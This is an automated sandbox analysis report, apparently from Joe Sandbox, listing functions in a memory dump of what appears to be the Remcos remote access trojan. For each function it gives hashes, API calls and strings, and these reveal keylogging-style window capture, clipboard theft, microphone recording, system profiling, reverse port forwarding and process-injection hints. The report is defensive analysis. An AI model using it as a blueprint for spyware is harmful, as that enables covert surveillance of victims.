Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414C60, 00414C68, 00414C6C
65535, xrefs: 00414BB3

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[, xrefs: 0040ADEE
], xrefs: 0040ADE8
minutes }, xrefs: 0040AE7A
{ User has been idle for , xrefs: 0040AE86

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A

Strings

SystemDrive, xrefs: 0040DA91
\SysWOW64, xrefs: 0040DB00
\system32, xrefs: 0040DAAE
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F
ProgramData, xrefs: 0040DB5F
AppData, xrefs: 0040DB51
UserProfile, xrefs: 0040DB58
ProgramFiles, xrefs: 0040DB6E
Temp, xrefs: 0040DA66

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32(?), ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
CloseChat, xrefs: 00405609
GetMessage, xrefs: 004055F8

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

Temp, xrefs: 00417D00
0VG, xrefs: 00417E21
0VG, xrefs: 00417DB5
<, xrefs: 00417D83
@, xrefs: 00417D8A

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

GetDirectListeningPort, xrefs: 004116B2
StartReverse, xrefs: 0041167F
StopForward, xrefs: 00411690
StartForward, xrefs: 00411673
NG, xrefs: 0041153A
StopReverse, xrefs: 004116A1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

log10, xrefs: 00455F71, 00455FC1
pow, xrefs: 0045600B, 004560B7, 004560CA
sqrt, xrefs: 004560AB
acos, xrefs: 0045609F
asin, xrefs: 00456093
log, xrefs: 00455FCD, 00455FD9
exp, xrefs: 00455FEC, 0045604E

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512

Strings

PkGNG, xrefs: 0044B3BE

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: PkGNG
API String ID: 1324828854-263838557
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

\sysinfo.txt, xrefs: 004174A0
temp, xrefs: 004174A5
dxdiag, xrefs: 004174EA
open, xrefs: 004174EF
/t , xrefs: 004174D4

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe), ref: 0040749E

Strings

windir, xrefs: 004073EA
PEB: %x, xrefs: 004074AF
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
\explorer.exe, xrefs: 00407400
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
explorer.exe, xrefs: 00407450, 0040747B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

.wav, xrefs: 00401D69
|MG, xrefs: 00401E08
%Y-%m-%d %H.%M, xrefs: 00401D41
dMG, xrefs: 00401D81

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

dMG, xrefs: 00401BED
PG, xrefs: 00401C27
|MG, xrefs: 00401C9B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32(?), ref: 0041D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

